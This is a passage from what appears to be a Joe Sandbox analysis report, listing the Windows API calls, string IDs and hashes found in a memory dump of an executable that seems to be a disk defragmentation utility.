                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                    • String ID: 4$COMBOBOX
                                                                                                                                                                                                                                                                                    • API String ID: 3327461832-2064896087
                                                                                                                                                                                                                                                                                    • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2611688555
                                                                                                                                                                                                                                                                                    • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040AEFA
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000048), ref: 0040AF5E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object
                                                                                                                                                                                                                                                                                    • String ID: CharSet$ClipPrecision$Escapement$Italic$Name$Orientation$OutPrecision$PitchAndFamily$Quality$Size$StrikeOut$Underline$Weight
                                                                                                                                                                                                                                                                                    • API String ID: 2936123098-848768055
                                                                                                                                                                                                                                                                                    • Opcode ID: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction ID: 678cc5ad66024a4e3a2d6689a74d43ebfb952ff3fe0b92c748617c9598e0b8bb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E021371508740DFD360DF61C984B5BB7F9EB88304F108A2EF98A87291D778A944CFA6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,113262B6), ref: 004215AC
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401097$ScheduleStart$` Zt$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1016491994-1829443342
                                                                                                                                                                                                                                                                                    • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                    • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                    • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                    • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                    • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                    • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
                                                                                                                                                                                                                                                                                    • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                    • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                    • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                    • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                    • String ID: &$>=
                                                                                                                                                                                                                                                                                    • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                    • Opcode ID: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 8a788743ff85fe53078408617ba339fa43619964413e8471535d34c3641ef31a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66A175B1E002059FDB14DF95D881AAFB7B5EF88304F14852EE919BB351D738E941CBA8
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000328,?,00000000), ref: 00453F69
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453FDE
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454016
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328,00000000,00000000), ref: 00454026
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454057
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 00454066
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?), ref: 00454071
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540A7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                    • Opcode ID: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                    • Instruction ID: dcbbcf768856184cb3fb00598b231148ced9fb8d52ef67d3d26bd90cee913ac4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA616C72608300AFC310DF69D88196BF7E4FFD8711F804A2EF55987291EB759848CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00453C29
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453C9B
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453CD3
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045B451), ref: 00453CE3
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453D14
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00453D23
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D2E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D64
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                    • Opcode ID: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e319efc0b140ea32d15ab3920dd7af36ea307e7c4a1d425a09acf6eef36fbe0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9617BB2608300AFC314DF69DC8196BF7F4EFD8751F804A2EF55983251E77599088B9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                    • Instruction ID: a9acc03ce2714c2a1218ac3b36ef8cf29172f02598394e016a1efff805efb144
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C516170390B00ABE624EB75CC82FD6B395AF44B04F40851DB359AB2D1CBF6B8418B48
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040ED30
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040EDD3
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EDF9
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040EE67
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040EE77
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0040EEEE
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040EFD9
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040F00C
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0040F073
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$CompatibleCopyCreateMessageSend$Bitmap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2897418849-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                    • Instruction ID: af6e71f7250828e30cc2f680655b832ce69016c02ffdd7eabd90966ae28b2504
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FC1F3B11083419FC324CF69C984B6BBBE9FF88704F108A2EF59993290DB74E945CB56
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 00425C5A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000003), ref: 00425C85
                                                                                                                                                                                                                                                                                    • CheckMenuItem.USER32(?,00008029,00000008), ref: 00425DAB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000088), ref: 00425DBD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CheckItemLoadRectWindow
                                                                                                                                                                                                                                                                                    • String ID: 1003007$1003008$1003009$1003010$3401095$DefragFinish$DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 64815558-1687404023
                                                                                                                                                                                                                                                                                    • Opcode ID: fcaecc0961985140fe5d44f65e3dcc1a4aba1751536b0007d645c60eb4d87030
                                                                                                                                                                                                                                                                                    • Instruction ID: 4418ca87599e6f793fb4d10bf028e48e6936bb9db45e74f47fa123fcf7e21ce3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcaecc0961985140fe5d44f65e3dcc1a4aba1751536b0007d645c60eb4d87030
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2151CAB1794701BAE350AB609C47FAB7268AB84B14F10C91FB75EB65C0CEFCA405875D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004159AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415AB2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402005$3402065$3402067$3402068$3402069$3402070$3402071$3402072$3402084
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-328498535
                                                                                                                                                                                                                                                                                    • Opcode ID: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                    • Instruction ID: 1067327c746e147da740696a904bc1cbb70a89f86cbb7c2e495eb833b01c89ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36413CF0B907407AD260AF618D43FEA3268AF84F04F60C42FB70E765D1CAEC6905969D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00417F45
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00417F5B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001001,00000000,?), ref: 0041804D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3401074$3401075$3401076$3401077$8<$DiskDefrag$Mid_Back_Color$Window
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2758692112
                                                                                                                                                                                                                                                                                    • Opcode ID: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                    • Instruction ID: 56ac88722a8962ac1f975558d68bc042bced7a88e006b99efbc398d4c5261ff8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B23156B07903007AE274EB258C83FEA72659F44B14F20452FB71E762D1CEF97844565C
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00451CBB
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0047D360,00000000,00000001,0047D170,?), ref: 00451CDF
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451CF8
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451D24
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451D4B
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451D72
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00451E17
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00451E1E
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00451E25
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00451E37
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0047EF4C), ref: 00451E69
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00451EA8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit$String$AllocCreateFreeInitializeInstance
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 162617764-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a3acebe906db87488b43d3aef87afcda0e18f97818647458927d115f12b3f92
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08712875A183509FC310CF68C844A5ABBE8FF89B20F158A5EF99897360D775E804CF92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FE87
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FF25
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 0042FF79
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FFF3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00430097
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 0043015F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
